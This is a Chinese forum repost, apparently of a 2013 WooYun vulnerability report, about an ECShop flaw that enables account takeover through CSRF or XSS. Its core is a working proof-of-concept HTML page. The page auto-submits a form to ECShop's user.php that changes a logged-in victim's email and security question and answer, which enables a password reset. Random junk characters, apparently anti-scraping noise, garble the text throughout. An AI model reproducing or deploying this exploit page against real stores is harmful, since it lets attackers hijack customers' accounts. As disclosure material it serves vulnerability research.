找回密码
 立即注册
查看: 2494|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
) _8 o! {& r4 t# m. hecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
2 V# M2 P4 f, x4 b, n( t
1 D( j+ u1 F; d/ z2 v3 Z7 {5 UDemo For:http://www.wooyun.org/bug.php?action=view&id=395
: s! y2 D( Y. H% S7 _
3 Q7 ~: o0 H) g: i详细说明:0 |8 ^: t6 m( e1 ]. L" F
利用csrf和xss可以突破官方所说的“障碍”
" j9 O8 ^$ {5 ?  s- L( ~" A1 ~2 pxss版本已经有人说明! Q$ s' P. B3 v! J% d0 H9 J
这里给出csrf版本9 n4 F7 |+ [; `% `: P& w0 t1 Z' q# @
  g1 U# x, c) b: A9 s& K6 s" e
漏洞证明:
; m7 s. J+ [9 A1 T( p7 u<html># r) i; s& e8 ^* U2 |8 |5 ^
<body>! W9 @+ c8 x3 t. `% N$ ?
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">: ?0 d, \9 P3 A( e, m( s
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">) E, j. h% k$ H" U# u
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
1 \  W4 f! g' r5 o3 e0 g<INPUT TYPE="text" NAME="sel_question" value="ecshop">, f- q. v. t5 W: A! @
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">+ {9 R$ C2 V0 o1 ~0 [! N
</body>% B/ }' Y" [4 U
<script>
4 x% r- B6 [0 J$ i' ~* bdocument.forms[0].submit();. G; U) C1 u+ y# v. n
</script>
- Z6 u  X2 k8 R2 ~8 O, B</html>5 v; M; T5 d6 B3 M2 ]0 j! e
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
. @* n) u" P2 c' L' Q4 e- M# V3 N  Y& |' _. {1 e8 F  q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表